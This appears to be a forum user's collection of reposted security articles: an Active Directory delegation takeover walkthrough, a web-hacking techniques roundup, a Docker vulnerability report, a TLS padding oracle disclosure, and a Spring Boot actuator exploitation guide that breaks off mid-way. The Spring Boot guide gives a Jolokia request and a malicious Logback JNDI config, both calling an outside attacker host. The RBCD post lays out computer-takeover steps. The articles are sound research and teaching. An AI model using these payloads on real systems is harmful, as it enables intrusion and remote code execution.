Everything posted by Nytro

  1. A Case Study in Wagging the Dog: Computer Takeover (Will, Feb 28) Last month, Elad Shamir released a phenomenal, in-depth post on abusing resource-based constrained delegation (RBCD) in Active Directory. One of the big points he discusses is that if the TrustedToAuthForDelegation UserAccountControl flag is not set, the S4U2self process will still work but the resulting TGS is not FORWARDABLE. This resulting service ticket will fail for traditional constrained delegation, but will still work in the S4U2proxy process for resource-based constrained delegation. Does the first paragraph sound like Greek? Check out these resources so it makes a bit more sense: Matan Hart's BlackHat Asia 2017 "Delegate to the Top" talk and whitepaper. The "S4U2Pwnage" post for background on traditional constrained delegation, including S4U2self/S4U2proxy. Ben Campbell's "Trust? Years to earn, seconds to break" for another perspective on the same topic. CyberArk's "Weakness Within: Kerberos Delegation" post on constrained delegation. The "Another Word on Delegation" post on the start of some of the resource-based constrained delegation (RBCD) material. Elad's "Wagging the Dog: Abusing Resource-Based Constrained Delegation to Attack Active Directory" for a complete set of details on his new RBCD research. Seriously, go read it. Why care? That's what I hope to show in this post with a practical example, instead of doing my normal dive-into-insane-depth-on-a-topic thing. The tl;dr is that Elad's new research gives us a generalized DACL-based computer takeover primitive (among other things; however, I'm focusing just on this example for now). This means that if we have an ACE entry allowing us the ability to somehow modify a specific field for a computer object in Active Directory (specifically msDS-AllowedToActOnBehalfOfOtherIdentity, so rights would include GenericAll, GenericWrite, WriteOwner, etc.)
we can abuse this access and a modified S4U Kerberos ticket request process to compromise the computer itself. Note: if DACLs, ACEs, and "object takeover" sound like another dialect of Greek to you, check out Andy Robbins' and my "Ace Up the Sleeve" talk and associated whitepaper for more security-focused DACL discussion. For another take on the subject, check out "The Unintended Risks of Trusting Active Directory" talk that Lee Christensen, Matt Nelson, and I gave at DerbyCon 2018. The tl;dr of the tl;dr is that if we can modify a computer object in Active Directory, we can compromise the computer itself in modern domains. There's one caveat: the domain the computer resides in has to have at least one 2012+ domain controller in order to support the resource-based constrained delegation abuse. If this isn't the case, and the domain only has domain controllers running Server 2008 (an 11-year-old operating system), there are probably other issues you can target for abuse : ) Taking over a Computer Object Through Resource-Based Constrained Delegation I'm not going to explain resource-based constrained delegation in depth, as the resources at the start of this post have all the information you need. Instead, I'm going to walk through a practical abuse example with syntax and screenshots illustrating the abuse so you can get a feel for how it works operationally. This scenario is fairly similar to the "Another Word on Delegation" post I published last year, as well as the "Generic DACL Abuse" section of Elad's post. That is, there's nothing new here; Elad covered everything in awesome depth with a ton of details and videos. I wanted to present a slightly different practical demonstration with full weaponization details in order to bring attention to his awesome research.
My test environment will be my standard Windows Server 2012R2 domain controller with a 2012R2 domain functional level, and a Windows 10 host: The domain is testlab.local with domain functional level 2012R2. The domain controller is primary.testlab.local, and is 2012R2. The client is Windows 10. The TESTLAB\attacker user account has GenericWrite access to the PRIMARY$ computer object, but has no other special privileges or rights. The tools used are PowerView, Kevin Robertson's Powermad (specifically the New-MachineAccount function), and Rubeus' S4U command. A text transcript of this scenario is available here. First we're going to load up our toolsets, confirm our identity, and verify that our current user has the proper DACL misconfiguration to allow abuse. Using PowerView to enumerate the specific ACE in the access control information for our target system (primary.testlab.local), we can see that we (TESTLAB\attacker) have GenericWrite over the PRIMARY$ computer object in Active Directory. The relevant syntax for these commands is here. As Elad details in his post, we need control of an account with a service principal name (SPN) set in order to weaponize the S4U2self/S4U2proxy process with resource-based constrained delegation. If we don't have preexisting control of such an object, we can create a new computer object that will have default SPNs set. This is possible because MachineAccountQuota is set to 10 by default in domains, meaning that regular domain users can create up to ten new machine accounts. So let's use the New-MachineAccount function in Kevin Robertson's Powermad project to stand up "attackersystem$" with the password "Symmer2018!". The relevant syntax for this command is here. The msDS-AllowedToActOnBehalfOfOtherIdentity field is an array of bytes representing a security descriptor.
I couldn't quite figure out all of the nuances of its structure, so I used the "official" way to add resource-based constrained delegation in my test lab, extracted the msDS-AllowedToActOnBehalfOfOtherIdentity field, and converted it to SDDL form. From this template, we can easily substitute in the SID of the newly created computer account that we control (which has an SPN!), convert it back to binary form, and store it in the msDS-AllowedToActOnBehalfOfOtherIdentity field of the computer object we're taking over using PowerView. The relevant syntax for these commands is here. Let's double-check that the security descriptor was added correctly. We can see below that the SecurityIdentifier in the entry states that the computer account attackersystem$ has "AccessAllowed". The relevant syntax for these commands is here. Let's review: we've modified a special property of our target computer object (primary.testlab.local) to state that a computer account (TESTLAB\attackersystem$) is allowed to pretend to be anyone in the domain to the primary computer. Since we have the password of attackersystem$ (as we created it, again abusing MachineAccountQuota), we can authenticate as attackersystem$ and abuse the resource-based constrained delegation process to compromise primary.testlab.local! In this case, we're targeting the service name (sname) of cifs, the service that backs file system access. First let's prove we don't have access, and then get the RC4_HMAC hashed version of the password. Relevant syntax here. And thanks to Elad's additions, we can execute this with a single Rubeus command. Relevant syntax here. Since PRIMARY$ is a domain controller, and the ldap service name backs the DCSync process, all we have to do is change the /msdsspn parameter from cifs/primary.testlab.local to ldap/primary.testlab.local if we wanted to DCSync instead. We can execute this for any service name (sname) we'd like to abuse.
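The SID-substitution step described above can be sketched in a few lines of Python. This is an illustrative sketch only, not the PowerView workflow itself: the SDDL template mirrors the shape produced by the "official" RBCD setup, and the SID value below is a hypothetical stand-in for the one you would extract from your own lab.

```python
# Illustrative sketch: substituting a controlled machine account's SID into
# an SDDL template extracted from msDS-AllowedToActOnBehalfOfOtherIdentity.
# Template shape and SID are hypothetical examples, not values from the post.

SDDL_TEMPLATE = "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;{sid})"

def build_rbcd_sddl(controlled_account_sid: str) -> str:
    """Return an SDDL string stating that the controlled account (which has
    an SPN) is allowed to act on behalf of other identities."""
    return SDDL_TEMPLATE.format(sid=controlled_account_sid)

# SID of the attacker-created attackersystem$ machine account (hypothetical)
sddl = build_rbcd_sddl("S-1-5-21-883232822-274137685-4173207997-1109")
print(sddl)
```

In the actual walkthrough this string would then be converted back to binary security-descriptor form and written to the target computer object with PowerView.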
Once we're done abusing the scenario, we can clean up with PowerView as well. Wrapup Elad's post is one of the best that I've read in a long time. It's filled with a ton of information and abuse scenarios that we'll be unpacking for a while as an industry. I strongly recommend anyone who's interested in these topics to start digesting Elad's post; you'll be that much better for it. I wanted to illustrate another example in this post to show how his research can be practically applied. We're also in the process of updating the BloodHound schema, and hope to integrate these DACL-based computer takeover primitives soon! Will Co-founder of Empire/BloodHound/Veil-Framework | PowerSploit developer | Microsoft PowerShell MVP | Security at the misfortune of others | http://specterops.io Source: https://posts.specterops.io/a-case-study-in-wagging-the-dog-computer-takeover-2bcb7f94c783
  2. Top 10 web hacking techniques of 2018 James Kettle | 27 February 2019 at 15:45 UTC The results are in! After an impressive 59 nominations followed by a community vote to pick 15 finalists, a panel consisting of myself and noted researchers Nicolas Grégoire, Soroush Dalili and Filedescriptor have conferred, voted, and selected the 10 most innovative new techniques that we think will withstand the test of time and inspire fresh attacks for years to come. We'll start at number 10, and count down towards the top technique of the year. 10. XS-Searching Google's bug tracker to find out vulnerable source code This blog post by Luan Herrera looks like a straightforward vulnerability write-up, right up until he innovatively uses a browser cache timing technique to eliminate network latency from a notoriously unreliable technique, making it surprisingly practical. I think we can expect to see more XS-Search bugs in the future. 9. Data Exfiltration via Formula Injection In this blog post, Ajay and Balaji explore a number of techniques for exfiltrating data from spreadsheets in Google Sheets and LibreOffice. It might be less shiny than higher-ranked items, but this is practical, easily applicable research that will be invaluable for anyone looking to quickly prove the impact of a formula injection vulnerability. If you're wondering what malicious spreadsheets have to do with web security, check out Comma Separated Vulnerabilities. It's also worth mentioning that 2018 brought us the first documented server-side formula injection. 8. Prepare(): Introducing novel Exploitation Techniques in WordPress WordPress is such a complex beast that exploiting it is increasingly becoming a stand-alone discipline. In this presentation, Robin Peraglie shares in-depth research of WordPress' misuse of double prepared statements, with a nice touch on PHP's infamous unserialize. 7.
Exploiting XXE with local DTD files Attempts to exploit blind XXE often rely on loading external, attacker-hosted files and are thus sometimes thwarted by firewalls blocking outbound traffic from the vulnerable server. In a blog post described by Nicolas as 'how to innovate in a well-known field', Arseniy Sharoglazov shares a creative technique to avoid the firewall problem by using a local file instead. Although limited to certain XML parsers and configurations, when it works this technique could easily make the difference between a DoS and a full server compromise. It also provoked a follow up comment showing an even more flexible refinement. 6. It's A PHP Unserialization Vulnerability Jim But Not As We Know It It's been known in some circles for a while that harmless sounding file operations like file_exists() could be abused using PHP's phar:// stream wrapper to trigger deserialisation and obtain RCE, but Sam Thomas' whitepaper and presentation finally dragged it out into the light for good with a robust investigation of practical concerns and numerous exploitation case studies including our friend WordPress. 5. Attacking 'Modern' Web Technologies In which Frans Rosen shares some quality research showing that deprecated or not, you can abuse HTML5 AppCache for some wonderful exploits. He also discusses some interesting postMessage attacks exploiting client-side race conditions. 4. Prototype pollution attacks in NodeJS applications It's always great to see a language-specific vulnerability that doesn't affect PHP, and this research presented by Olivier Arteau at NorthSec is no exception. It details a novel technique to get RCE on NodeJS applications by using __proto__ based attacks that have previously only been applied to client-side applications. I suspect you could scan for this vulnerability by adding __proto__ as a magic word inside Backslash Powered Scanner, but be warned that this may semi-permanently take down vulnerable websites. 3. 
Beyond XSS: Edge Side Include Injection Continuing the theme of legacy web technologies getting a second wind as exploit vectors, Louis Dion-Marcil discovered that numerous popular reverse proxies sometimes let hackers abuse Edge Side Includes to give their XSS superpowers, including SSRF. This quality research demonstrates numerous high-impact exploit scenarios, and also proves it's more than just an XSS escalation technique by enabling exploitation of HTML within JSON responses. 2. Practical Web Cache Poisoning: Redefining 'Unexploitable' This research by, er, James Kettle shows techniques to poison web caches with malicious content using obscure HTTP headers. I was naturally banned from voting/commenting on it, but the other panelists described it as 'excellent and extensive fresh research on an old topic', 'original and well executed research, with a very clear methodology', and 'simple yet beautiful'. I highly recommend taking a read, even if just so you can decide for yourself if I cheated my way to near-victory. 1. Breaking Parser Logic: Take Your Path Normalization off and Pop 0days Out! Orange Tsai has taken an attack surface many mistakenly thought was hardened beyond hope, and smashed it to pieces. His superb presentation shows how subtle flaws in path validation can be twisted with consistently severe results. The entire panel loved this research for its practicality, raw impact, and wide-ranging fallout, affecting frameworks, standalone webservers, and reverse proxies alike. This is the second year running that research by Orange has topped the board, so we'll be paying close attention during 2019! Runners up The huge number of nominations led to a particularly brutal community vote this year, with numerous respectable pieces of research failing to make the shortlist. As such, if the top 10 leaves you clamouring for more, you might want to peruse the entire nomination list as well as last year's top 10. What next?
Looking ahead to next year, I'll try to make the community vote stage a bit slicker by doing a slightly stricter filter on nominations - in particular, I'll reject vulnerability writeups that purely apply known techniques in an unoriginal way. We'll also look into improving the vote UI, and perhaps allowing comments during voting so you can explain the reasoning behind your favourite research. This year's vote rolled around really quickly thanks to last year's occurring way behind schedule, but next year the process will be launched in January 2020. As usual, we're already open for nominations. Finally, I'd like to thank everyone in the community for your research, nominations, votes and patience. Till next year! James Kettle @albinowax Source: https://portswigger.net/blog/top-10-web-hacking-techniques-of-2018
  3. Top ten most popular docker images each contain at least 30 vulnerabilities February 26, 2019 | in Ecosystems, Open Source | By Liran Tal Welcome to Snyk's annual State of Open Source Security report 2019. This report is split into several posts: Maven Central packages double; a quarter of a million new packages indexed in npm 88% increase in application library vulnerabilities over two years 81% believe developers should own security, but they aren't well-equipped Open source maintainers want to be secure, but 70% lack skills Top ten most popular docker images each contain at least 30 vulnerabilities ReDoS vulnerabilities in npm spikes by 143% and XSS continues to grow 78% of vulnerabilities are found in indirect dependencies, making remediation complex Or download our lovely handcrafted pdf report which contains all of this information and more in one place. DOWNLOAD THE STATE OF OPEN SOURCE SECURITY REPORT 2019! Known vulnerabilities in docker images The adoption of application container technology is increasing at a remarkable rate and is expected to grow by a further 40% in 2020, according to 451 Research. It is common for system libraries to be available in many docker images, as these rely on a parent image that is commonly using a Linux distribution as a base. Docker images almost always bring known vulnerabilities alongside their great value We've scanned through ten of the most popular images with Snyk's recently released docker scanning capabilities. The findings show that in every docker image we scanned, we found vulnerable versions of system libraries. The official Node.js image ships 580 vulnerable system libraries, followed by the others, each of which ships at least 30 publicly known vulnerabilities. Snyk recently released its container vulnerability management solution to empower developers to fully own the security of their dockerized applications.
Using this new capability, developers can find known vulnerabilities in their docker base images and fix them using Snyk's remediation advice. Snyk suggests either a minimal upgrade, or alternative base images that contain fewer or even no vulnerabilities. Fixes can be easy if you're aware. 20% of images can fix vulnerabilities simply by rebuilding a docker image, 44% by swapping base image Based on scans performed by Snyk users, we found that 44% of docker image scans had known vulnerabilities for which there were newer and more secure base images available. This remediation advice is unique to Snyk. Developers can take action to upgrade their docker images. Snyk also reported that 20% of docker image scans had known vulnerabilities that simply required a rebuild of the image to reduce the number of vulnerabilities. Vulnerability differentiation based on image tag The current Long Term Support (LTS) version of the Node.js runtime is version 10. The image tagged with 10 (i.e. node:10) is essentially an alias to node:10.14.2-jessie (at the time that we tested it), where jessie specifies an obsolete version of Debian that is no longer actively maintained. If you had chosen that image as a base image in your Dockerfile, you'd be exposing yourself to 582 vulnerable system libraries bundled with the image. Another option is to use the node:10-slim image tag, which provides slimmer images without unnecessary dependencies (for example, it omits the man pages and other assets). Choosing node:10-slim however would still pull in 71 vulnerable system libraries. Most vulnerabilities originate in the base image you selected. For that reason, remediation should focus on base image fixes The node:10-alpine image is a better option to choose if you want a very small base image with a minimal set of system libraries. However, while no vulnerabilities were detected in the version of the Alpine image we tested, that's not to say that it is necessarily free of security issues.
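The tag behavior described above (node:10 silently aliasing node:10.14.2-jessie, plus -slim and -alpine variants) can be illustrated with a tiny parser. This is a simplified sketch, not Docker's actual reference grammar: real image references also allow registries, namespaces, and digests, all of which are ignored here.

```python
# Simplified sketch: split a Docker image reference into repository, version,
# and variant, to compare a floating alias tag (node:10) with a pinned one
# (node:10.8.0-jessie). Registries and digests are deliberately ignored.

def parse_image_ref(ref: str):
    repo, _, tag = ref.partition(":")
    tag = tag or "latest"                 # no tag means the floating "latest"
    version, _, variant = tag.partition("-")
    return {"repo": repo, "version": version, "variant": variant or None}

print(parse_image_ref("node:10"))            # floating alias, no variant
print(parse_image_ref("node:10.8.0-jessie")) # pinned version + distro variant
print(parse_image_ref("node:10-alpine"))     # alias + minimal variant
```

Pinning a full version such as node:10.8.0-jessie freezes the system libraries you ship, which is exactly why a scanner can then recommend a newer image with fewer known vulnerabilities.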
Alpine Linux handles vulnerabilities differently than the other major distros, which prefer to backport sets of patches. At Alpine, they prefer rapid release cycles for their images, with each image release providing a system library upgrade. Moreover, Alpine Linux doesn't maintain a security advisory program, which means that if a system library has vulnerabilities, Alpine Linux will not issue an official advisory about it; Alpine Linux will mitigate the vulnerability by creating a new base image version including a new version of that library that fixes the issue, if one is available (as opposed to backporting as mentioned). There is no guarantee that the newer fixed version of a vulnerable library will be immediately available on Alpine Linux, although that is the case many times. Despite this, if you can safely move to the Alpine Linux version without breaking your application, you can reduce the attack surface of your environment because you will be using fewer libraries. The use of an image tag, like node:10, is in reality an alias to another image, which constantly rotates with new minor and patched versions of 10 as they are released. A practice that some teams follow is to use a specific version tag instead of an alias so that their base image would be node:10.8.0-jessie for example. However, as newer releases of Node 10 are released, there is a good chance those newer images will include fewer system library vulnerabilities. Using the Snyk Docker scanning features we found that when a project uses a specific version tag such as node:10.8.0-jessie, we could then recommend newer images that contain fewer vulnerabilities. Known vulnerabilities in system libraries There is an increase in the number of vulnerabilities reported for system libraries, affecting some of the popular Linux distributions such as Debian, RedHat Enterprise Linux and Ubuntu.
In 2018 alone we tracked 1,597 vulnerabilities in system libraries with known CVEs assigned for these distros, which is more than four times the number of vulnerabilities compared to 2017. As we look at the breakdown of vulnerabilities (high and critical) it is clear that this severity level is continuing to increase through 2017 and 2018. Continue reading: Maven Central packages double; a quarter of a million new packages indexed in npm 88% increase in application library vulnerabilities over two years 81% believe developers should own security, but they aren't well-equipped Open source maintainers want to be secure, but 70% lack skills Top ten most popular docker images each contain at least 30 vulnerabilities ReDoS vulnerabilities in npm spikes by 143% and XSS continues to grow 78% of vulnerabilities are found in indirect dependencies, making remediation complex DOWNLOAD THE STATE OF OPEN SOURCE SECURITY REPORT 2019! Source: https://snyk.io/blog/top-ten-most-popular-docker-images-each-contain-at-least-30-vulnerabilities/
  4. TLS Padding Oracles The TLS protocol provides encryption, data integrity, and authentication on the modern Internet. Despite the protocol’s importance, currently-deployed TLS versions use obsolete cryptographic algorithms which have been broken using various attacks. One prominent class of such attacks is CBC padding oracle attacks. These attacks allow an adversary to decrypt TLS traffic by observing different server behaviors which depend on the validity of CBC padding. We evaluated the Alexa Top Million Websites for CBC padding oracle vulnerabilities in TLS implementations and revealed vulnerabilities in 1.83% of them, detecting nearly 100 different vulnerabilities. These padding oracles stem from subtle differences in server behavior, such as responding with different TLS alerts, or with different TCP header flags. We suspect the subtlety of different server responses is the reason these padding oracles were not detected previously. Full Technical Paper Robert Merget, Juraj Somorovsky, Nimrod Aviram, Craig Young, Janis Fliegenschmidt, Jörg Schwenk, Yuval Shavitt: Scalable Scanning and Automatic Classification of TLS Padding Oracle Vulnerabilities. USENIX Security 2019 The full paper will be presented at USENIX Security in August 2019. Who Is Affected? Since the identification of different vendors is fairly difficult and requires the cooperation of the scanned websites, a lot of our vulnerabilities are not attributed yet. On this Github page, we collect the current status of the responsible disclosure process and give an overview of the revealed vulnerabilities. The currently identified and fixed vulnerabilities are: OpenSSL. CVE-2019-1559. OpenSSL Security Advisory: 0-byte record padding oracle Citrix. CVE-2019-6485. TLS Padding Oracle Vulnerability in Citrix Application Delivery Controller (ADC) and NetScaler Gateway. F5. CVE-2019-6593. TMM TLS virtual server vulnerability CVE-2019-6593. The disclosure process is still running with a handful of vendors. 
Some of them are considering disabling or even completely removing CBC cipher suites from their products. Recommendations for TLS Implementation Developers If you are developing a TLS implementation, this is obviously a good reminder to review your CBC code and make sure it does not expose a padding oracle; obviously, this is easier said than done. We therefore invite developers of TLS implementations to contact us in this matter. We will evaluate your implementation and if you are vulnerable, work with you to understand the nature of the vulnerability. (To be clear, we will do this free of charge.) We will link the final version of our scanning tool detecting these vulnerabilities in the coming days. Background Cipher Block Chaining (CBC) mode of operation The CBC mode of operation allows one to encrypt plaintexts of arbitrary length with block ciphers like AES or 3DES. In CBC mode, each plaintext block is XOR'ed with the previous ciphertext block before being encrypted by the block cipher. We simply refer to Wikipedia for more information. Padding oracle attacks exploit the CBC malleability. The problem with CBC is that it allows an attacker to perform meaningful plaintext modifications without knowing the symmetric key. More concretely, it allows an attacker to flip a specific plaintext bit by flipping a bit in the previous ciphertext block. This CBC property has already been exploited in many attacks, for example, most recently in the Efail attack. CBC and its usage in the TLS record layer In order to protect messages (records) exchanged between TLS peers, it is possible to use different cryptographic primitives. One of them is a MAC combined with AES in CBC mode of operation. Unfortunately, TLS decided to use the MAC-then-PAD-then-Encrypt mechanism, which means that the encryptor first computes a MAC over the plaintext, then pads the message to achieve a multiple of the block length, and finally uses AES-CBC to produce the ciphertext.
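The MAC-then-pad-then-encrypt layout and the CBC malleability described above can be demonstrated in a short, self-contained sketch. To stay standard-library-only, it substitutes a toy XOR "block cipher" for AES; this is an assumption made purely for illustration (the toy cipher is wildly insecure), but the CBC chaining structure and the bit-flipping property it demonstrates are exactly those of real CBC.

```python
import hmac, hashlib, os

BLOCK = 16

def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

# Toy single-block "cipher": XOR with the key. Insecure, but invertible,
# which is all we need to show CBC's structure and malleability.
def E(block, key):
    return xor(block, key)

def D(block, key):
    return xor(block, key)

def cbc_encrypt(plaintext, key, iv):
    blocks, prev = [], iv
    for i in range(0, len(plaintext), BLOCK):
        prev = E(xor(plaintext[i:i + BLOCK], prev), key)
        blocks.append(prev)
    return b"".join(blocks)

def cbc_decrypt(ciphertext, key, iv):
    out, prev = [], iv
    for i in range(0, len(ciphertext), BLOCK):
        c = ciphertext[i:i + BLOCK]
        out.append(xor(D(c, key), prev))
        prev = c
    return b"".join(out)

# TLS-style MAC-then-pad: 5 bytes of data + 20-byte HMAC-SHA1 = 25 bytes,
# padded to 32 with 7 bytes of 0x06 (6 padding bytes plus the length byte).
key, mac_key, iv = os.urandom(BLOCK), os.urandom(20), os.urandom(BLOCK)
data = b"hello"
mac = hmac.new(mac_key, data, hashlib.sha1).digest()
pad_len = BLOCK - (len(data) + len(mac)) % BLOCK       # 7 bytes total
record = data + mac + bytes([pad_len - 1]) * pad_len   # all pad bytes 0x06
ct = cbc_encrypt(record, key, iv)

# CBC malleability: flipping one bit in ciphertext block i flips the same
# bit in plaintext block i+1 (with a real block cipher, block i itself
# would additionally decrypt to garbage).
tampered = bytearray(ct)
tampered[0] ^= 0x01                       # flip one bit in the first block
pt = cbc_decrypt(bytes(tampered), key, iv)
print(pt[BLOCK] ^ record[BLOCK])          # prints 1: exactly that bit flipped
```

Because the padding bytes sit at the end of the record, this same bit-flipping lets an attacker tamper with padding and then watch how the server reacts, which is the observable behavior the padding oracle attacks below exploit.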
For example, if we want to encrypt five bytes of data and use HMAC-SHA (with a 20-byte output), we end up with two blocks. The second block needs to be padded with 7 bytes of 0x06. Padding oracle attacks In 2002, Vaudenay showed that revealing padding failures after message decryption could have severe consequences for the security of the application. Since the CBC malleability allows an attacker to flip arbitrary message bytes, the attacker is also able to modify specific padding bytes. If the application decrypts the modified message and reports problems related to padding validity, the attacker is able to learn the underlying plaintext. We refer to this explanation by Erlend Oftedal for more details. In TLS, the attack is a bit more complex because the targeted TLS connection is always closed once invalid padding is triggered. Nevertheless, the vulnerability is practically exploitable in BEAST scenarios and allows the attacker to decrypt repeated secrets like session cookies. Therefore, it is very important that TLS implementations do not reveal any information about padding validity. This includes different TLS alerts, connection states, or even timing behavior. Vulnerability Details OpenSSL (CVE-2019-1559) With the help of the Amazon security team, we identified a vulnerability which was mostly found on Amazon servers and Amazon Web Services (AWS). Hosts affected by this vulnerability immediately respond to most records with BAD_RECORD_MAC and CLOSE_NOTIFY alerts, and then close the connection. However, if the hosts encounter a zero-length record with valid padding and a MAC present, they do not immediately close the TCP connection, regardless of the validity of the MAC. Instead, they keep the connection alive for more than 4 seconds after sending the CLOSE_NOTIFY alert. This difference in behavior is easily observable over the network.
Note that the MAC value does not need to be correct for triggering this timeout; it is sufficient to create valid padding which causes the decrypted data to be of zero length. Further investigations revealed that the Amazon servers were running an implementation which uses the OpenSSL 1.0.2 API. In some cases, the function calls to the API return different error codes depending on whether a MAC or padding error occurred. The Amazon application then takes different code paths based on these error codes, and the different paths result in an observable difference in the TCP layer. The vulnerable behavior only occurs when AES-NI is not used. Citrix (CVE-2019-6485) The vulnerable Citrix implementations first check the last padding byte and then verify the MAC. If the MAC is invalid, the server closes the connection. This is done with either a connection timeout or an RST, depending on the validity of the remaining padding bytes. However, if the MAC is valid, the server checks whether all other remaining padding bytes are correct. If they are not, the server responds with a BAD_RECORD_MAC and an RST (if they are valid, the record is well-formed and is accepted). This behavior can be exploited with an attack similar to POODLE. FAQ Can these vulnerabilities be exploited? Yes, but exploitation is fairly difficult. If you use one of the above implementations, you should still make sure you have patched. To be more specific, the attack can be exploited in BEAST scenarios. There are two prerequisites for the attack. First, the attacker must be able to run a script in the victim's browser which sends requests to a vulnerable website. This can be achieved by tempting the victim to visit a malicious website. Second, the attacker must be able to modify requests sent by the browser and observe the server behavior. The second prerequisite is much harder to achieve, because the attacker must be an active Man-in-the-Middle. Have these vulnerabilities actually been exploited?
We have no reason to believe these vulnerabilities have been exploited in the wild so far. I used a vulnerable implementation. Do I need to revoke my certificate? No, this attack does not recover the server's private key. Do I need to update my browser? No. These are server-side vulnerabilities, and can only be fixed by deploying a fix on the server. How many implementations are vulnerable? Our Alexa scans identified more than 90 different server behaviors triggered in our padding oracle scans. Some of them will probably be caused by outdated servers. However, we assume many of the newest servers will need fixes. How is this related to previous research? In 2002, Vaudenay presented an attack which targets messages encrypted with the CBC mode of operation. The attack exploits the malleability of the CBC mode, which allows altering the ciphertext such that specific cleartext bits are flipped, without knowledge of the encryption key. The attack requires a server that decrypts a message and responds with 1 or 0 based on the message validity. This behavior essentially provides the attacker with a cryptographic oracle which can be used to mount an adaptive chosen-ciphertext attack. The attacker exploits this behavior to decrypt messages by executing adaptive queries. Vaudenay exploited a specific form of vulnerable behavior, where implementations validate the CBC padding structure and respond with 1 or 0 accordingly. This class of attacks has been termed padding oracle attacks. Different types of CBC padding oracles have been used to break the confidentiality of TLS connections. These include Lucky Thirteen, Lucky Microseconds, Lucky 13 Strikes Back, and Ronen et al. Another important attack is POODLE (Padding Oracle On Downgraded Legacy Encryption) which targets SSLv3 and its specific padding scheme. In SSLv3 only the last padding byte is checked. 
Möller, Duong and Kotowicz exploited this behavior and showed that for implementations it is necessary to correctly verify all padding bytes. Similar behaviors were found in several TLS implementations. How is it possible that such an old vulnerability is still present in 2019? Writing this code correctly is very hard, even for experts. For example, in one instance experts have introduced a severe form of this vulnerability while attempting to patch the code to eliminate it. Identifying these vulnerabilities is also hard, since some of them only manifest under a combination of specific conditions. For example, the OpenSSL vulnerability only manifests in OpenSSL version 1.0.2, only for non-stitched [1] cipher suites, when AES-NI is not used. It also requires subtle interactions between external code that calls the OpenSSL API, and the OpenSSL code itself. We take this opportunity to suggest deprecating CBC cipher suites in TLS altogether. [1]: Stitched ciphersuites is an OpenSSL term for optimised implementations of certain commonly used ciphersuites. See here for more details. Why are you not submitting your findings via BugBounty websites? We tried to get in contact with security teams via common BugBounty sites but had very bad experiences. Man-in-the-Middle attacks are usually out of scope for most website owners, and security teams did not know how to deal with this kind of issue. We lost a lot of "Points" on Hackerone and BugCrowd for reporting such issues (with the intention of informing the vendor) and learned absolutely nothing by doing this. All in all, a very frustrating experience. We hope that our new approach of disclosure is more useful for getting in contact with developers and vendors. Can this attack be used against Bitcoin? No. This attack is based on the vulnerability present in the Cipher Block Chaining (CBC) mode of operation. Bitcoin does not use CBC.
However, if you are a blockchain designer, we strongly recommend that you evaluate the security of your block chaining technology and, especially, its padding scheme.

Do you have a name or a logo for this vulnerability?
No. Sorry, not this time.

Sursa: https://github.com/RUB-NDS/TLS-Padding-Oracles
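The CBC malleability the FAQ describes (flipping a ciphertext bit flips a specific plaintext bit in the next block) can be illustrated with a toy sketch. The "block cipher" here is a plain XOR, purely for illustration and NOT a real cipher; with a real cipher the modified ciphertext block itself decrypts to garbage, but the controlled bit-flip in the following plaintext block works exactly the same way.

```python
# Toy illustration of CBC malleability (XOR "block cipher" is an
# illustrative assumption, NOT a real cipher).
BLOCK = 8
KEY = 0x5A

def enc_block(b):
    return bytes(x ^ KEY for x in b)

dec_block = enc_block  # XOR is its own inverse

def cbc_encrypt(iv, pt):
    out, prev = b"", iv
    for i in range(0, len(pt), BLOCK):
        c = enc_block(bytes(a ^ b for a, b in zip(pt[i:i + BLOCK], prev)))
        out += c
        prev = c
    return out

def cbc_decrypt(iv, ct):
    out, prev = b"", iv
    for i in range(0, len(ct), BLOCK):
        blk = ct[i:i + BLOCK]
        out += bytes(a ^ b for a, b in zip(dec_block(blk), prev))
        prev = blk
    return out

iv = b"\x00" * BLOCK
pt = b"PAY 0001PAY 0001"
ct = bytearray(cbc_encrypt(iv, pt))
ct[7] ^= 0x01          # flip one bit in ciphertext block 1...
pt2 = cbc_decrypt(iv, bytes(ct))
print(pt2[8:])         # ...and the same bit flips in plaintext block 2
```

No knowledge of the key is needed for the flip, which is the property a padding oracle then leverages to decrypt byte by byte.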
  5. Exploiting Spring Boot Actuators
By Michael Stepankin

The Spring Boot Framework includes a number of features called actuators to help you monitor and manage your web application when you push it to production. Intended to be used for auditing, health, and metrics gathering, they can also open a hidden door to your server when misconfigured.

When a Spring Boot application is running, it automatically registers several endpoints (such as '/health', '/trace', '/beans', '/env', etc.) into the routing process. For Spring Boot 1.0 through 1.4, they are accessible without authentication, causing significant security problems. Starting with Spring Boot 1.5, all endpoints apart from '/health' and '/info' are considered sensitive and secured by default, but this security is often disabled by the application developers.

The following actuator endpoints could potentially have security implications leading to possible vulnerabilities:

/dump - displays a dump of threads (including a stack trace)
/trace - displays the last several HTTP messages (which could include session identifiers)
/logfile - outputs the contents of the log file
/shutdown - shuts the application down
/mappings - shows all of the MVC controller mappings
/env - provides access to the configuration environment
/restart - restarts the application

For Spring 1.x, they are registered under the root URL, and in 2.x they moved to the '/actuator/' base path.

Exploitation:
Most of the actuators support only GET requests and simply reveal sensitive configuration data, but several of them are particularly interesting for shell hunters:

1. Remote Code Execution via '/jolokia'
If the Jolokia library is in the target application classpath, it is automatically exposed by Spring Boot under the '/jolokia' actuator endpoint. Jolokia allows HTTP access to all registered MBeans and is designed to perform the same operations you can perform with JMX.
It is possible to list all available MBeans actions using the URL: http://127.0.0.1:8090/jolokia/list

Again, most of the MBeans actions just reveal some system data, but one is particularly interesting: the 'reloadByURL' action, provided by the Logback library, allows us to reload the logging config from an external URL. It can be triggered just by navigating to:

http://localhost:8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/artsploit.com!/logback.xml

So, why should we care about logging config? Mainly because of two things:

1. The config has an XML format and, of course, Logback parses it with external entities enabled; hence it is vulnerable to blind XXE.
2. The Logback config has the feature 'Obtaining variables from JNDI'. In the XML file, we can include a tag like '<insertFromJNDI env-entry-name="java:comp/env/appName" as="appName" />' and the name attribute will be passed to the DirContext.lookup() method. If we can supply an arbitrary name to the .lookup() function, we don't even need XXE or HeapDump because it gives us full Remote Code Execution.

How it works:

1. An attacker requests the aforementioned URL to execute the 'reloadByURL' function, provided by the 'ch.qos.logback.classic.jmx.JMXConfigurator' class.
2. The 'reloadByURL' function downloads a new config from http://artsploit.com/logback.xml and parses it as a Logback config. This malicious config should have the following content:

<configuration>
  <insertFromJNDI env-entry-name="ldap://artsploit.com:1389/jndi" as="appName" />
</configuration>

